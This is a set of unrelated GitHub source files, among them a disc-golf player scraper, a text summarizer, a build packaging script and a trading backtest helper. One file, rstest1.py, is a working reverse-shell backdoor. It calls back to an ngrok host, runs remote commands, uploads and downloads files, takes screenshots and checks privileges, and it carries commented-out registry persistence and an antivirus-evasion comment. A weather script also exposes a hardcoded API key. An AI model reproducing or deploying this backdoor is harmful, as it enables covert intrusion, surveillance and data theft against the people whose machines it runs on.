self.loclink = pi.find('li', class_='location').find('a')['href']
else:
self.city = ''
self.state = ''
self.country = ''
self.loclink = ''
self.rating = pi.find('li', class_='current-rating')
if self.rating:
self.rating = self.rating.text.split('Current Rating: ')[1].split(' ')[0]
else:
self.rating = ''
self.classification = pi.find('li', class_='classification')
if self.classification:
self.classification = self.classification.text.split('Classification: ')[1]
else:
self.classification = ''
self.events = pi.find('li', class_='career-events')
if self.events:
self.events = self.events.text.split('Career Events: ')[1].replace(',', '')
else:
self.events = ''
self.earnings = pi.find('li', class_='career-earnings')
if self.earnings:
self.earnings = self.earnings.text.split('Career Earnings: ')[1].replace(',', '').strip('$')
else:
self.earnings = '0'
self.wins = pi.find('li', class_='career-wins disclaimer')
if self.wins:
self.wins = self.wins.text.split('Career Wins: ')[1]
else:
self.wins = '0'
self.store_vals()
self.write_data()
# Set values to store in file
def store_vals(self):
self.store = [self.pdga, self.name, self.city, self.state, self.country, self.loclink, self.classification,
self.joindate, self.status, self.expiration, self.rating, self.events, self.wins, self.earnings,
self.today]
print(self.store)
# Append player to file
def write_data(self):
with open(playersFile, 'a+', newline='', encoding='utf-8') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writer.writerow(self.store)
# Display detailed data on each a player
def verbose(self):
print(f'Scrape Date: {self.today}')
print(f"ID: {self.pdga}")
print(f"Name: {self.name}")
print(f"Status: {self.status}")
print(f"Expiration: {self.expiration}")
print(f"City: {self.city}")
print(f"State: {self.state}")
print(f"Location Link: {self.loclink}")
print(f"Country: {self.country}")
print(f"Rating: {self.rating}")
print(f"Classification: {self.classification}")
print(f"Events: {self.events}")
print(f"Wins: {self.wins}")
print(f"Earnings: {self.earnings}")
# Check if player page exists before trying to scrape profile
def check_failures(self, soup):
fail = ['Page not found', 'Access denied']
if any(x in soup.h1.get_text() for x in fail):
print(f'Not a valid player: {self.pdga}')
self.name = ''
self.status = ''
self.start = ''
self.expiration = ''
self.city = ''
self.state = ''
self.country = ''
self.loclink = ''
self.rating = ''
self.classification = ''
self.earnings = ''
self.events = ''
self.wins = ''
self.joindate = ''
self.store_vals()
self.failure = True
# Create player file if it doesn't exist. If it does exist return the next user to scrape.
def check_file():
header = ['id', 'name', 'city', 'state', 'country', 'loclink', 'classification', 'joindate', 'status', 'expiration',
'rating', 'events', 'wins', 'earnings', 'scrape date']
if os.path.exists(playersFile):
print(f'Appending to already created file - {playersFile}')
return get_recent_scrape()
else:
print(f'File created - {playersFile}')
with open(playersFile, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writer.writerow(header)
return 0
# Get total number of PDGA players to set limit of scraping
def find_last_player():
print('\nFinding number of registered PDGA members...')
pl = requests.get(
'https://www.pdga.com/players?FirstName=&LastName=&PDGANum=&Status=All&Gender=All&Class=All&MemberType=All'
'&City=&StateProv=All&Country=All&Country_1=All&UpdateDate=&order=PDGANum&sort=desc')
psoup = BeautifulSoup(pl.text, 'html.parser')
last_player = psoup.find('table', class_='views-table cols-8').find('td', class_='views-field views-field-PDGANum '
'active pdga-number').get_text(
).rstrip()
print(f'There are {int(last_player)} registered PDGA members!!!')
return int(last_player)
# Get the last PDGA member scraped and saved
def get_recent_scrape():
# Since threading can cause the last saved player to be out of order check the last THREADS number of lines
# and find the max PDGA number of the last saved
with open(playersFile, "r", encoding="utf-8", errors="ignore") as scraped:
# final_line = (scraped.readlines()[-1].split(',')[0])
        print(f'Checking last {THREADS} lines to find last saved player')
last_lines = []
scrape = scraped.readlines()
for line in range(1, int(THREADS) + 1):
# print(f"Line: {line} - {scrape[-line].split(',')[0]}")
last_lines.append(scrape[-line].split(',')[0])
nextScrape = int(max(last_lines)) + 1
print(f'Last lines: {last_lines}')
print(f"\nThe last player scrapted was PDGA #{max(last_lines)}")
print(f"Continuing scraping on PDGA #{nextScrape}...")
return nextScrape
# Return [next player to scrape, most recent registered member]
def get_range():
return range(check_file(), find_last_player())
# Scrape function for threading
def scrape_player():
global ids
while True:
pdga = ids.get()
Player(pdga)
ids.task_done()
# Fill queue with remaining players
def fill_queue():
id_range = get_range()
for id in id_range:
ids.put(id)
print(f'\nAdding PDGA members from {id_range[0]} to {id_range[1]}')
print(f'Queue of IDs full with {ids.qsize()} members to go!')
if __name__ == '__main__':
fill_queue()
print('Starting scraping of members...')
for i in range(THREADS):
print(f'Starting thread #{i}')
t = threading.Thread(target=scrape_player)
t.start()
| zcrosman/PDGAscrape | PDGAscrape.py | PDGAscrape.py | py | 9,296 | python | en | code | 0 | github-code | 36 |
17891621206 | __author__ = 'rogermao'
class person:
    """A person with availability flags, conflict dates, and assignment counters."""
    def __init__(self,name):
self.name = name
self.gender = ""
self.conflictDates = []
self.experience = -1
self.largeGroup = True
self.nineThirty = True
self.twelveThirty = True
self.largeGroupCount = 0
self.nineThirtyCount = 0
self.twelveThirtyCount = 0
self.car = False
self.dates = []
def addLargeGroup(self):
self.largeGroupCount += 1
def addNineThirty(self):
self.nineThirtyCount += 1
def addTwelveThirty(self):
self.twelveThirtyCount += 1
| toheebster/welcoMe | Person.py | Person.py | py | 621 | python | en | code | 0 | github-code | 36 |
73712141864 | from typing import Dict, Any
from argus.processors.post_processors.utils import post_process as pp
from h2o_docai_scorer.post_processors.post_processor_supply_chain import PostProcessor as PostProcessorSupplyChain
class PostProcessor(PostProcessorSupplyChain):
"""Represents a last step in pipeline process that receives all pipeline intermediate
results and translates them into a final json structure that will be returned to user.
"""
def get_pages(self) -> Dict[int, Any]:
return super().get_pages()
def get_entities(self):
if not self.has_labelling_model:
return []
docs = pp.post_process_predictions(
model_preds=self.label_via_predictions,
top_n_preds=self.label_top_n,
token_merge_type="MIXED_MERGE",
token_merge_xdist_regular=1.0,
label_merge_x_regular="ALL",
token_merge_xydist_regular=1.0,
label_merge_xy_regular="address",
token_merge_xdist_wide=1.5,
label_merge_x_wide="phone|fax",
output_labels="INCLUDE_O",
verbose=True,
)
df_list = []
for doc in docs:
predictions = docs[doc]
predictions = predictions.round(decimals=4)
for idx, row in predictions.iterrows():
df_list.append(row.to_dict())
return df_list
'''
Converting the dictionary to a dataframe
import pandas as pd
import json
f = open('result.json')
dict_data = json.load(f)
df = pd.DataFrame(dict_data['entities'])
df.to_csv('result.csv')
'''
| h2oai/docai-recipes | post_processor/v0.6/post_processor_4.py | post_processor_4.py | py | 1,636 | python | en | code | 4 | github-code | 36 |
28436305539 | import socket
import subprocess
import json
import os
import base64
import sys
import shutil
import time
import requests
from termcolor import colored
from mss import mss
def reliable_send(data):
json_data=json.dumps(data)
sock.send(json_data.encode('utf-8'))
def reliable_recv():
data=''
while True:
try:
data=data+sock.recv(1024).decode('utf-8')
return json.loads(data)
except ValueError:
continue
def download(url):
get_res=requests.get(url)
file_name=url.split("/")[-1]
with open(file_name,"wb") as file:
file.write(get_res.content)
def screenshot():
with mss() as screenshot:
screenshot.shot()
def is_admin():
global admin
try:
        temp=os.listdir(os.sep.join([os.environ.get('SystemRoot', r'C:\windows'),'temp']))
except:
admin="[!!] user privileges"
else:
admin="[+] administrator priviliges"
def connection():
while True:
time.sleep(7)
try:
sock.connect(('0.tcp.ngrok.io',11174))
shell()
except:
connection()
def shell():
while True:
command=reliable_recv()
cmd=str(command)
if cmd=="":
break
print("Command from the server: "+cmd)
if cmd.lower()=="q":
print("socket closed")
break
elif command=="help":
            help_options=''' download path  --> download a file from target pc
                            upload path --> upload a file to target pc
                            get url --> download a file from the internet
                            check  --> checking privileges
                            screenshot --> screenshot target pc
                            help --> help options
                            start path --> starting a program
                            q --> stop the shell
   '''
reliable_send(help_options)
elif cmd[:2] =="cd" and len(cmd)>2:
try:
os.chdir(cmd[3:])
except:
continue
elif command[:8]=="download":
with open(command[9:],"rb") as file:
file_data=base64.b64encode(file.read())
reliable_send(file_data.decode())
elif command[:6]=="upload":
with open(command[7:],"wb") as fle:
fle_data=reliable_recv()
fle.write(base64.b64decode(fle_data))
elif command[:3] =="get":
try:
download(command[4:])
reliable_send(colored('[+] Downloaded file with the given url','green'))
except:
reliable_send(colored('[+] File Downloaded failed','red'))
elif command[:5]=="start" and len(command[6:])>13:
lst=command[6:].split(".")
try:
subprocess.Popen(lst[-1][:len(lst[-1])-1],shell=True)
reliable_send("[+] started")
except:
reliable_send("[-] Failed to start")
elif command[:5] =="start":
try:
subprocess.Popen(command[6:],shell=True)
reliable_send("[+] started")
except:
reliable_send("[-] Failed to start")
elif command[:10]=="screenshot":
try:
screenshot()
with open('monitor-1.png','rb') as img:
img_data=base64.b64encode(img.read())
img_data=img_data.decode('utf-8')
reliable_send(img_data)
os.remove('monitor-1.png')
except:
failed="[!!] failed to take screenshot"
reliable_send(failed)
elif command[:5]=="check":
try:
is_admin()
reliable_send(admin)
except:
reliable_send("[-] Cannot perform the task")
else:
proc=subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
result=proc.stdout.read() +proc.stderr.read()
reliable_send(result.decode('utf-8'))
# location=os.environ["appdata"]+"\\winhar32.exe"
# if not os.path.exists(location):
# shutil.copy(sys.executable,location)
# subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "' + location +'"', shell=True)
# file_name=sys._MEIPASS+"\image.jpg"
# try:
# subprocess.Popen(file_name,shell=True)
# except:
# # to bypass antivirus
# num=1
# num2=3
# num3=num+num2
# file_name=sys._MEIPASS+"\image.jpg"
# file_name is only defined when the commented-out PyInstaller block above is enabled,
# so this call is expected to fail (and be swallowed) otherwise
try:
  subprocess.Popen(file_name,shell=True)
except:
  # to bypass antivirus
  num=1
  num2=3
  num3=num+num2
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connection()
sock.close()
# check the ip address
| sharshith1312/reverse_shell | rstest1.py | rstest1.py | py | 5,215 | python | en | code | 0 | github-code | 36 |
43314571963 | import requests
def getweather(city):
api = "96e3cd3e19571466a39662b984eec5f1"
server = "https://api.openweathermap.org/data/2.5/weather"
request = f"{server}?q={city}&appid={api}"
output = requests.get(request)
if output.status_code == 200:
weather_data = output.json()
weather = weather_data["weather"][0]["main"]
description = weather_data["weather"][0]["description"]
temperature = str(round(weather_data["main"]["temp"] - 273.15, 1)) + " °C"
pressure = str(round(weather_data["main"]["pressure"] * 100 * 0.00750063755419211, 1)) + " mmHg"
output_weather = \
f"""Weather: {weather}, {description},
t°: {temperature},
Pressure: {pressure}"""
return f"{output_weather}"
else:
return "City not found"
| XBOPb/Projects | API_Weather_App/weatherAPI.py | weatherAPI.py | py | 821 | python | en | code | 0 | github-code | 36 |
40286818253 | # типы данных и переменная
# int, float, boolean, str, list, None
# value = None
# print(type(value))
# a = 123
# b = 1.23
# print(a)
# print(b)
value = 12334
# print(type(value))
# s = 'hello nworld'
# print(s) # print the string
# print(a, ' - ', b, ' - ', s)
# print('{1} - {2} - {0}'.format(a, b, s)) # str.format
# print(f'{a} - {b} - {s}') # f-string interpolation
# f = False
# print(f)
# list = ['1', '2', '3']
# print(list)
# Data input and output
# print('Enter a')
# a = int(input())
# print('Enter b')
# b = int(input())
# print(a, ' + ', b, ' = ', a + b)
# ARITHMETIC OPERATIONS
# a = 1.31231223
# b = 3
# c = round(a * b, 7)
# print(c)
# a = 3
# a += 5
# print(a)
# LOGICAL OPERATIONS
# a = [1, 2]
# b = [1, 2]
# print(a == b)
# a = 1 < 3 < 5 > 7
# print(a)
# func = 1
# T = 4
# x = 2
# print(func < T > x)
# f = [1, 2, 3, 4]
# print(f)
# print(not 2 in f)
# is_odd = f[0] % 2 == 0
# print(is_odd)
# if, if-else
# a = int(input('a = '))
# b = int(input('b = '))
# if a > b:
# print(a)
# else:
# print(b)
# while, do while
# original = 23
# inverted = 0
# while original != 0:
# inverted = inverted * 10 + (original % 10)
#     original //= 10 # integer division by 10
# else:
#     print('Perhaps')
#     print('that is enough )')
# print(inverted)
# for
# for i in range(1, 10, 2):
# print(i)
# STRINGS
# text = 'eat some more of these soft French rolls'
# print(text[0])
# print(len(text))
# help(int) # built-in help
# FUNCTIONS
def f(x):
if x == 1:
        return 'Integer'
elif x == 2.3:
return 23
else:
return
arg = 2.3
print(f(arg))
print(type(f(arg)))
| stannavi/python_intro_sborisovsky | lections/lec1.py | lec1.py | py | 1,822 | python | ru | code | 0 | github-code | 36 |
19530926102 | """
Brazilian Navy Project (Projeto Marinha do Brasil)
Author: Pedro Henrique Braga Lisboa (pedro.lisboa@lps.ufrj.br)
Signal Processing Laboratory - UFRJ
Sonar Technology Laboratory - UFRJ / Brazilian Navy
"""
from __future__ import print_function, division
import os
import h5py
import warnings
import numpy as np
import scipy.io.wavfile as wav
import soundfile as sf
def load_raw_data(input_db_path, verbose=0):
"""
    Loads sonar audio datafiles into memory.
    This function returns a nested hashmap associating each run's audio data with its
    class and filename. The audio information is composed of
    the frames stored in a numpy array and the sample rate reported by the file.
E.g. for database '4classes' the returned dictionary will be set like:
ClassA:
navio10.wav:
signal: np.array
sample_rate: np.float64
navio11.wav:
signal: np.array
sample_rate: np.float64
ClassB:
navio20.wav:
...
navio21.wav:
...
...
...
    params:
        input_db_path (string):
            path to the database folder
    return (SonarDict):
        nested dictionary in which the basic unit contains
        a record of the audio (signal key) in np.array format
        and the sample_rate (fs key) stored in floating point.
        The returned object also contains a method for applying
        functions over the runs (see SonarDict.apply).
        The mapping associates each signal/sample-rate record with
        the corresponding run name.
"""
if verbose:
print('Reading Raw data in path %s' % input_db_path)
class_folders = [folder for folder in os.listdir(input_db_path)
if not folder.startswith('.')]
raw_data = dict()
for cls_folder in class_folders:
runfiles = os.listdir(os.path.join(input_db_path, cls_folder))
if not runfiles: # No files found inside the class folder
if verbose:
print('Empty directory %s' % cls_folder)
continue
if verbose:
print('Reading %s' % cls_folder)
runfiles = os.listdir(os.path.join(input_db_path, cls_folder))
runpaths = [os.path.join(input_db_path, cls_folder, runfile)
for runfile in runfiles]
runfiles = [runfile.replace('.wav', '') for runfile in runfiles]
audio_data = [read_audio_file(runpath) for runpath in runpaths]
raw_data[cls_folder] = {
runfile: {'signal': signal, 'fs': fs}
for runfile, (signal, fs) in zip(runfiles, audio_data)
}
return SonarDict(raw_data)
# class RunRecord(dict):
# """
# Basic dicionary for storing the runs
# binding the data with its respective metadata(sample rate)
# This wrapper was made to standardize the keynames.
# """
# def __init__(self, signal, fs):
# self.__dict__['signal'] = signal
# self.__dict__['fs'] = fs
# def __getitem__(self , k):
# return self.__dict__[k]
class SonarDict(dict):
"""
Wrapper for easy application of preprocessing functions
"""
def __init__(self, raw_data):
super(SonarDict, self).__init__(raw_data)
@staticmethod
def from_hdf5(filepath):
f = h5py.File(filepath, 'r')
raw_data = SonarDict.__level_from_hdf5(f)
f.close()
return SonarDict(raw_data)
@staticmethod
def __level_from_hdf5(group_level):
level_dict = dict()
for key in group_level.keys():
if isinstance(group_level[key], h5py._hl.group.Group):
level_dict[key] = SonarDict.__level_from_hdf5(group_level[key])
elif isinstance(group_level[key], h5py._hl.dataset.Dataset):
# if isinstance(group_level[key].dtype, 'float64')
level_dict[key] = group_level[key][()]
else:
raise ValueError
return level_dict
def to_hdf5(self, filepath):
f = h5py.File(filepath, 'w')
SonarDict.__level_to_hdf5(self, f, '')
f.close()
@staticmethod
def __level_to_hdf5(dictionary_level, f, dpath):
for key in dictionary_level.keys():
ndpath = dpath + '/%s' % key
if isinstance(dictionary_level[key], dict):
SonarDict.__level_to_hdf5(dictionary_level[key], f, ndpath)
else:
if isinstance(dictionary_level[key], np.ndarray):
dtype = dictionary_level[key].dtype
else:
dtype = type(dictionary_level[key])
f.create_dataset(ndpath, data=dictionary_level[key], dtype=dtype)
def apply(self, fn,*args, **kwargs):
"""
Apply a function over each run of the dataset.
params:
fn: callable to be applied over the data. Receives at least
one parameter: dictionary (RunRecord)
args: optional params to fn
kwargs: optional named params to fn
return:
new SonarDict object with the processed data. The inner structure
of signal, sample_rate pair is mantained, which allows for chaining
several preprocessing steps.
"""
sonar_cp = self.copy()
return SonarDict({
cls_name: self._apply_on_class(cls_data, fn, *args, **kwargs)
for cls_name, cls_data in sonar_cp.items()
})
def _apply_on_class(self, cls_data, fn, *args, **kwargs):
"""
Apply a function over each run signal of a single class.
Auxiliary function for applying over the dataset
"""
return {
run_name: fn(raw_data, *args, **kwargs)
for run_name, raw_data in cls_data.items()
}
def read_audio_file(filepath):
signal, fs = sf.read(filepath)
return signal, fs
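# Hedged usage sketch (the dataset path is a placeholder):
#
#   sonar = load_raw_data('/path/to/4classes', verbose=1)
#   # each run record is a {'signal': np.array, 'fs': float} dict, so apply() can
#   # chain preprocessing steps that keep the same layout:
#   normalized = sonar.apply(lambda rec: {
#       'signal': (rec['signal'] - rec['signal'].mean()) / rec['signal'].std(),
#       'fs': rec['fs'],
#   })
#   normalized.to_hdf5('runs.h5')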
| pedrolisboa/poseidon | poseidon/io/offline.py | offline.py | py | 6,116 | python | en | code | 2 | github-code | 36 |
1947313325 | import unittest
import pathlib
import typing
import kclvm.compiler.parser.parser as parser
import kclvm.tools.docs.doc_parser as doc_parser
import kclvm.kcl.types.checker as type_checker
import kclvm.api.object as obj_pkg
import kclvm.tools.docs.model_pb2 as model
_DIR_PATH = pathlib.Path(__file__).parent.joinpath("doc_data") / "source_files"
def resolve(kcl_file: str) -> typing.List[model.SchemaDoc]:
prog = parser.LoadProgram(kcl_file)
type_checker.ResolveProgramImport(prog)
checker = type_checker.TypeChecker(prog, type_checker.CheckConfig())
checker.check_import(prog.MAIN_PKGPATH)
checker.init_global_types()
schemas = prog.pkgs[prog.MAIN_PKGPATH][0].GetSchemaList()
schema_docs: typing.List[model.SchemaDoc] = []
for schema in schemas:
schema_obj_type = checker.scope_map[prog.MAIN_PKGPATH].elems[schema.name].type
assert isinstance(schema_obj_type, obj_pkg.KCLSchemaDefTypeObject)
schema_docs.append(
doc_parser.SchemaDocParser(
schema=schema,
schema_type=schema_obj_type.schema_type,
root=prog.root,
).doc
)
return schema_docs
class KCLDocCheckerTest(unittest.TestCase):
def test_simple_case(self) -> None:
docs = resolve(_DIR_PATH / "simple.k")
assert len(docs) == 1
doc = docs[0]
assert doc.doc.startswith("Person is a simple schema")
assert doc.attributes[0].name == "name"
assert doc.attributes[0].type.type_str == "str"
assert doc.attributes[0].is_optional is False
assert doc.attributes[0].default_value == '"Default"'
assert doc.attributes[0].doc.startswith("A Normal attribute named 'name'")
assert doc.attributes[1].name == "age"
assert doc.attributes[1].type.type_str == "int"
assert doc.attributes[1].is_optional is True
assert doc.attributes[1].default_value == "18"
assert doc.attributes[1].doc.startswith("A Normal attribute named 'age'")
assert doc.examples.startswith("person = Person {")
if __name__ == "__main__":
unittest.main(verbosity=2)
| kcl-lang/kcl-py | test/test_units/test_kclvm/test_tools/test_doc/test_checker.py | test_checker.py | py | 2,149 | python | en | code | 8 | github-code | 36 |
15386994551 | #!/usr/bin/env python3
"""게임과 론처를 묶어서 새 앱 프로토콜 버전을 서명한 뒤 패키지로 생성한다."""
import argparse
import os
import os.path
import logging
import shutil
import tarfile
import tempfile
import zipfile
from zipfile import ZIP_DEFLATED
parser = argparse.ArgumentParser(description=__doc__.replace('\n', ' '))
parser.add_argument('out_dir')
parser.add_argument('platform', choices={'macOS', 'Windows', 'Linux'})
parser.add_argument('game_dir')
parser.add_argument('timestamp')
parser.add_argument(
'--verbose', '-v',
action='store_const', const=logging.DEBUG, default=logging.INFO,
)
def main() -> None:
args = parser.parse_args()
logging.basicConfig(level=args.verbose)
temp_dir = tempfile.mkdtemp()
for root in [args.game_dir]:
for name in os.listdir(root):
path = os.path.join(root, name)
tmppath = os.path.join(temp_dir, name)
if os.path.isdir(path):
if not os.path.isdir(tmppath): # skip duplicate dirs
shutil.copytree(path, tmppath)
else:
if not os.path.isfile(tmppath): # skip duplicate files
shutil.copy2(path, tmppath)
logging.info('Copy: %s -> %s', path, tmppath)
    # Create the archive
os.makedirs(args.out_dir, exist_ok=True)
if args.platform.lower() == 'macos':
archive_path = os.path.join(args.out_dir, 'macOS.tar.gz')
executable_path = os.path.join(
temp_dir,
'9c.app/Contents/MacOS/9c'
)
os.chmod(executable_path, 0o755)
with tarfile.open(archive_path, 'w:gz') as archive:
for arcname in os.listdir(temp_dir):
name = os.path.join(temp_dir, arcname)
archive.add(name, arcname=arcname)
logging.info('Added: %s <- %s', arcname, name)
elif args.platform.lower() == 'linux':
archive_path = os.path.join(args.out_dir, 'Linux.tar.gz')
executable_path = os.path.join(
temp_dir,
'9c'
)
os.chmod(executable_path, 0o755)
with tarfile.open(archive_path, 'w:gz') as archive:
for arcname in os.listdir(temp_dir):
name = os.path.join(temp_dir, arcname)
archive.add(name, arcname=arcname)
logging.info('Added: %s <- %s', arcname, name)
elif args.platform.lower() == 'windows':
archive_path = os.path.join(args.out_dir, 'Windows.zip')
with zipfile.ZipFile(archive_path, 'w', ZIP_DEFLATED) as archive:
basepath = os.path.abspath(temp_dir) + os.sep
for path, dirs, files in os.walk(temp_dir):
logging.debug('Walk: %r, %r, %r', path, dirs, files)
for name in files + dirs:
fullname = os.path.abspath(os.path.join(path, name))
assert fullname.startswith(basepath)
relname = fullname[len(basepath):]
archive.write(fullname, relname)
logging.info('Added: %s <- %s', relname, fullname)
else:
return parser.exit(1, f'unsupported platform: {args.platform}')
logging.info('Created an archive: %s', archive_path)
shutil.rmtree(temp_dir)
if __name__ == '__main__':
main()
| FioX0/PandoraReborn | tools/pack/pack.py | pack.py | py | 3,340 | python | en | code | 0 | github-code | 36 |
4130563060 | import os
import os.path
# example user input C:\Users\<yourownusername>\Desktop
while True:
dir = input('Input the path file:')
if dir == '': break
if os.path.isdir(dir):
file_types = {}
file_size = {}
for r,d,f in os.walk(dir):
for fi in f:
if fi[0] not in '.~':
f_parts = fi.split('.')
if len(f_parts)>1:
f_type = f_parts[-1]
file_types[f_type]=file_types.get(f_type,0)+1
for t in file_types:
print(t,'\t\t',file_types[t]) | AlexandrosPanag/My_Python_Projects | OS/OS_File_Format.py | OS_File_Format.py | py | 610 | python | en | code | 1 | github-code | 36 |
12087004714 | from sklearn.feature_extraction.text import TfidfVectorizer
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import spacy,os
import argparse
import re
from tqdm import tqdm
from collections import OrderedDict
import string
import numpy as np
from spacy.lang.en import English
import time
nl = English()
import sys
import pandas as pd
repeat = 5
data = []
doc = []
l3 = []
summary = []
hypothesis = ""
word_count = []
pair_similarity = []
summary_string = []
def count_word(index):
global doc
Doc = nl(doc[index])
tokens = [t.text for t in Doc]
tokens = [t for t in tokens if len(t.translate(t.maketrans('', '', string.punctuation + string.whitespace))) > 0] # + string.digits
return len(tokens)
def store_word_count():
global word_count,doc
word_count = []
for i in range(0,len(doc)):
word_count.append(count_word(i))
def maximum(index, toPrint=0):
global summary, pair_similarity
length = len(summary)
if(length!=0):
max=0
for i in range(length):
a=pair_similarity[index][summary[i]]
if(a>max):
max=a
if toPrint:
print(str(summary[i])+" -> "+str(a))
return max
else:
return 0
def count_sum(summary):
sum=0
length = len(summary)
for i in range(length):
sum+=count_word(summary[i])
return sum
def mmr_sorted(lambda_, doc, length):
    """Greedy MMR selection: repeatedly add the sentence with the highest
    lambda_ * (max similarity to any other sentence)
      - (1 - lambda_) * (max similarity to sentences already selected),
    stopping once the summary reaches `length` words."""
    global word_count, pair_similarity, summary
    #print('Inside MMR')
    print(length)
l3 = []
vectorizer = TfidfVectorizer(smooth_idf=False)
X = vectorizer.fit_transform(doc)
y = X.toarray()
rows = y.shape[0]
cols = y.shape[1]
pair_similarity = []
for i in range(rows):
max=-1
pair_similarity.append([])
for j in range(rows):
if(j!=i):
a = np.sum(np.multiply(y[i],y[j]))
pair_similarity[-1].append(a)
if(a>max):
max=a
else:
pair_similarity[-1].append(1)
l3.append(max)
store_word_count()
l = len(doc)
count = 0
last = -1
summary = []
summary_word_count = 0
while(1):
if (summary_word_count < length):
max=-1
for i in range(l):
a = maximum(i)
mmrscore = lambda_*l3[i] - (1-lambda_)*a
if(mmrscore >= max):
max = mmrscore
ind = i
summary.append(ind)
summary_word_count += word_count[ind]
else:
#print('Bye')
break
def listToString():
global summary_string, word_count, hypothesis, summary, doc
summary_string = []
leng = 0
for i in summary:
if doc[i] not in summary_string:
summary_string.append(doc[i])
leng += word_count[i]
hypothesis = "".join(summary_string)
parser = argparse.ArgumentParser()
parser.add_argument('--data_path', default = 'data/text/', type = str, help = 'Folder containing textual data')
parser.add_argument('--summary_path', default = 'data/summaries/', type = str, help = 'Folder to store features of the textual data')
parser.add_argument('--length_file', default = 'data/length.txt', type = str, help = 'Path to file containing summary length')
args = parser.parse_args()
print('Generating summary in ...'+args.summary_path)
num_docs = len(os.listdir(args.data_path))
X1 = pd.read_csv(args.length_file, sep="\t", header=None)
for i in tqdm(range(0,num_docs)):
length1=X1[1][i]
#length2=X2[1][i]
doc = []
with open(os.path.join(args.data_path,X1[0][i]), 'r') as file:
for x in file:
if x != '\n':
doc.append(x)
lamda=0.6
#for j in lamda:
mmr_sorted(lamda,doc,length1)
listToString()
f= open(os.path.join(args.summary_path,X1[0][i]),"w+")
n = f.write(hypothesis)
f.close()
hypothesis=""
| Law-AI/summarization | extractive/MMR/MMR.py | MMR.py | py | 4,098 | python | en | code | 139 | github-code | 36 |
10156278888 | from turtle import Turtle
FONT = ("Courier", 24, "normal")
ALIGNMENT = "center"
class Scoreboard(Turtle):
def __init__(self):
super().__init__()
self.score = 0
self.level = 1
self.penup()
self.hideturtle()
self.color("white")
with open("high_score.txt", "r") as score:
self.high_score = score.read()
self.update_score()
def increase_score(self):
self.clear()
self.score += 1
self.update_score()
def update_score(self):
self.goto(0, 250)
self.write(arg=f"Score: {self.score} Level: {self.level} High Score: {self.high_score}",
align=ALIGNMENT,
font=FONT)
def game_over(self, outcome):
self.goto(0, 0)
if outcome == "Win":
message = "YOU WIN"
elif outcome == "Lose":
message = "GAME OVER"
self.write(arg=f"{message}", align=ALIGNMENT, font=FONT)
def update_high_score(self):
with open("high_score.txt", "w") as score:
score.write(f"{self.score}")
| vaughnhamill/breakout-game | scoreboard.py | scoreboard.py | py | 1,106 | python | en | code | 0 | github-code | 36 |
71673325543 | import gc
import pandas as pd
import numpy as np
from .order import simulate_lqe_model
from .order import (
simulate_batch_lqe_model,
simulate_batch_from_order_func_low_param,
)
from .strategies.components.statistics import (
score_results, return_results, _weighted_average
)
def pairs_cross_validator(
close_train_sets:list, open_train_sets:list, params:dict, commission:float=0.0008,
slippage:float=0.0010, burnin:int=500, cash:int=100_000, order_size:float=0.10,
freq:str=None, hedge:str="dollar", transformation:str="default", model='LQE',
rf=0.00, standard_score='zscore', seed=False,
) -> pd.DataFrame:
"""Train param batch against cross-validated training (and validation) data.
Notes
-----
For detailed documentation see `optimizers.simulations.order.simulate_batch_from_order_func`
Parameters
----------
close_train_set : list
open_train_sets : list
params : dict
commission : float, optional
slippage : float, optional
burnin : int, optional
cash : int, optional
order_size : float, optional
freq : None or str, optional
hedge : str, optional
close_validation_sets : None or list, optional
transformation : str, optional
seed_filter : str, optional
Returns
-------
DataFrame
Return a dataframe indexed to parameter combinations with a
series of statistics for evaluating simulation performance.
See Also
--------
* `optimizers.simulations.order.simulate_batch_from_order_func`
* `optimizers.simulations.statistics._weighted_average`
* `optimizers.simulations.statistics._calculate_mse`
* `vbt.Portfolio`
"""
fitness_results = []
test_data = zip(close_train_sets, open_train_sets)
for idx, (close_prices, open_prices) in enumerate(test_data):
if model == 'LQE':
if (seed and idx == 0) or not seed:
seed_set = np.array([])
elif seed and idx != 0:
seed_set = pd.concat(close_train_sets[:idx]).values
df = simulate_batch_lqe_model(
close_prices, open_prices, params,
burnin=burnin,
cash=cash,
commission=commission,
slippage=slippage,
order_size=order_size,
freq=freq,
hedge=hedge,
transformation=transformation,
rf=rf,
standard_score=standard_score,
seed=seed_set
)
fitness_results.append(df)
gc.collect()
elif model == 'LQE2':
df = simulate_batch_from_order_func_low_param(
close_prices, open_prices, params,
burnin=burnin,
cash=cash,
commission=commission,
slippage=slippage,
order_size=order_size,
freq=freq,
hedge=hedge,
model=transformation,
rf=rf,
)
fitness_results.append(df)
gc.collect()
else:
raise ValueError(f'No {model} model found in simulations')
# Calculate mean results for each param across folds
train_cv_results = pd.concat(fitness_results, axis=1)
train_cv_results = train_cv_results.fillna(0)
weighted_wr = _weighted_average(train_cv_results)
mean_results = train_cv_results.groupby(by=train_cv_results.columns, axis=1).mean()
return pd.concat([mean_results, weighted_wr], axis=1)
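# Hedged usage sketch (illustrative only -- the fold lists and the parameter grid below
# are placeholders; the exact shape of `params` is defined by simulate_batch_lqe_model):
#
#   params = {...}                      # hypothetical parameter batch
#   cv_table = pairs_cross_validator(close_folds, open_folds, params,
#                                     freq='1h', hedge='dollar', model='LQE')
#   cv_table.head()                     # mean fold statistics per parameter set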
def testParams(
close_test_sets:list, open_test_sets:list, period:float, upper:float,
lower:float, exit:float, delta:float=1e-5, vt:float=1.0, burnin:int=500,
transformation:str="default", cash:int=100_000, commission:float=0.0008,
slippage:float=0.0010, order_size:float=0.10, freq:None or str=None,
hedge:str="dollar",
):
"""Test unique parameter set against multi-fold test set data
Notes
-----
For detailed documentation see `optimizers.simulations._order.simulate_batch_from_order_func`
Parameters
----------
close_test_set : list
open_test_sets : list
period : float
upper : float
lower : float
exit : float
delta : float, optional
vt : float, optional
burnin : int, optional
transformation : str, optional
commission : float, optional
slippage : float, optional
burnin : int, optional
cash : int, optional
order_size : float, optional
freq : None or str, optional
hedge : str, optional
Returns
-------
tuple
Returns a tuple of pandas Series with relevant statistics for
evaluation
See Also
--------
